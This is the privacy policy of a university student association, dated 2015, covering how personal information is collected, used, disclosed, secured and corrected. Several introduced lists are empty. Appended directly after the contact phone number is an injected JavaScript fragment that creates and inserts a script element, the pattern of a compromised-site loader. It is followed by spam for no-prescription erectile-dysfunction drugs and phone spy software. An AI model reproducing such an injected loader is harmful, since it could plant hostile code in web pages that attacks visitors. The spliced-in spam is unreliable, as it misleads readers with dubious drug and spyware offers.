Bond University Student Association

Bond University Student Association Incorporated Privacy Policy

Date: 29 June 2015

1      Our commitment to your privacy

Bond University Student Association Incorporated (ABN 58 810 177 092) (BUSA, we, our or us) respects the privacy of our members, customers and other individuals we deal with in the course of our operations. BUSA, operating in Australia, is bound by the Australian Privacy Principles in the Privacy Act 1988 (Cth) (the Privacy Act), as well as other privacy laws applicable to us.

2       Kinds of personal information collected and held

BUSA may collect, use and disclose the personal information of its members, customers and other individuals for the purposes of our operations. In each case, the precise nature of the collection, use and disclosure of personal information depends on the nature of your interaction with us (for example, the products or services you request and receive from us).

We may collect personal information about you in a number of circumstances, including if you:

3      How your personal information is collected and held

3.1    General information

We collect personal information about you in a number of ways, including:

3.2    Information about your use of our website

In general, you can browse our website without telling us who you are or revealing any personal information about yourself. We are, however, able to determine your IP address. We use your IP address to help diagnose problems with our server, to administer our website, to monitor the use of our website and to improve the content of our website. In short, we use your IP address to gather aggregate demographic information.

There are a few places on our website where you are able to provide us with your personal information directly, such as when you order a product, enter a contest or sweepstakes, fill out a survey or send us feedback. The nature of the personal information we collect will depend on your use of the website. It is completely optional for you to engage in these activities. If you elect to engage in these activities, however, we may ask that you provide us personal information, such as your first and last name, mailing address (including post or zip code), email address, telephone and facsimile numbers, and other personal identifying information. When ordering products on our website, you may be asked to provide a credit card details. Depending upon the activity, some of the information we ask you to provide is identified as mandatory and some as voluntary. If you do not provide the mandatory data with respect to a particular activity, you will not be able to engage in that activity.

The BUSA website may contain links to other non-BUSA websites. BUSA is not responsible for the privacy practices of the entities who administer those non-BUSA websites or the content of such websites. You should exercise your best judgement when sharing personal information on these websites.

4      The purposes for which we collect, hold and disclose your personal information

We collect the personal information we need to provide products, services and information to our customers and the community and for our operations generally.

If you choose not to provide certain personal information to us, we may not be able to provide you with the products, services or information you require.

We (and the organisations to which we disclose your information (see section 5 below)) generally use your personal information for the purposes for which it was collected or as otherwise permitted by law, for example to:

From time to time, we may send you marketing communications about our products and services. If you do not wish to receive further marketing communications from BUSA you can send us an email at busa@bond.edu.au and tell us that you do not want to receive future communications.

5      How your personal information may be disclosed

We may disclose your personal information to various entities depending on what services you receive from us, for example:

6      Keeping your information secure

We want you to have continuing trust in BUSA and in our products and services and, so, we have put in place reasonable physical, electronic and managerial procedures to safeguard and secure your personal information.

In order to most efficiently serve you, credit card transactions and order fulfilment are handled by established third party banking, processing agents and distribution institutions. They receive the information needed to verify and authorise your credit card or other payment information and to process and ship your order.

Unfortunately, no data transmission over the Internet or any wireless network can be guaranteed to be 100% secure. As a result, while we strive to protect your personal information, you acknowledge that: (a) there are security and privacy limitations of the Internet which are beyond our control; (b) the security, integrity and privacy of any and all information and data exchanged between you and us through our website cannot be guaranteed; and (c) any such information and data may be viewed or tampered with in transit by a third party.

7      How you can access or seek correction of your personal information or make a complaint

You can seek access to personal information that we hold about you by contacting BUSA using the details set out in section 9 of this Privacy Policy. In some circumstances it may not be possible to provide you with all of your personal information. Where this is the case, we will tell you why. When you request access, we may need to take measures to verify your identity.

If you think that any personal information we hold about you is inaccurate and would like to request that we correct it, please contact BUSA using the details set out in section 9 of this Privacy Policy and we will take reasonable steps to ensure that it is corrected.

If you wish to make a complaint about the way we have handled your personal information (including if you think we have breached the Privacy Act) you may do so to our President in writing, by mail or email to the address or email address set out in section 9 of this Privacy Policy. When you contact us, please include your email address, name, address and telephone number and clearly describe your complaint. Our President will acknowledge your complaint and respond to you regarding your complaint within a reasonable period of time. If you consider that we have failed to resolve the complaint satisfactorily, we will provide you with information about the further steps you can take.

8      Changes to our privacy policy

We may need to update our Privacy Policy from time to time to reflect our changing business practices. We may modify or update our Privacy Policy by publishing the modified or updated version on our website. We encourage you to check our website periodically to ensure that you are aware of our current Privacy Policy.

9      How to contact us

For access and correction enquiries and complaints, please contact our President using the contact details below.

Address: 14 University Drive, Bond University 4229, Queensland, Australia

Email: busa@bond.edu.au

Telephone: 0755954009var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);Tadalafil No Rx. Men’s Health. Dental Whitening, Mastercard, Female Enhancement tadalafil no rx. Tadalafil No Rx. Canadian Pharmacy, Guaranteed Shipping. Valid pharmacy recognized by the CFA. Free viagra pills! Buy Sildenafil (Generic Viagra) Online. 25mg, 50mg, 100mg tablets from MedExpress UK with Next Day Delivery buy sildenafil. Order Sildenafil from Superdrug – From ВЈ18 – Choose between 25mg, 50mg and 100mg tablets – Online Prescription and Delivery Included..The most popular 2017 spy software applications for the mobile phones.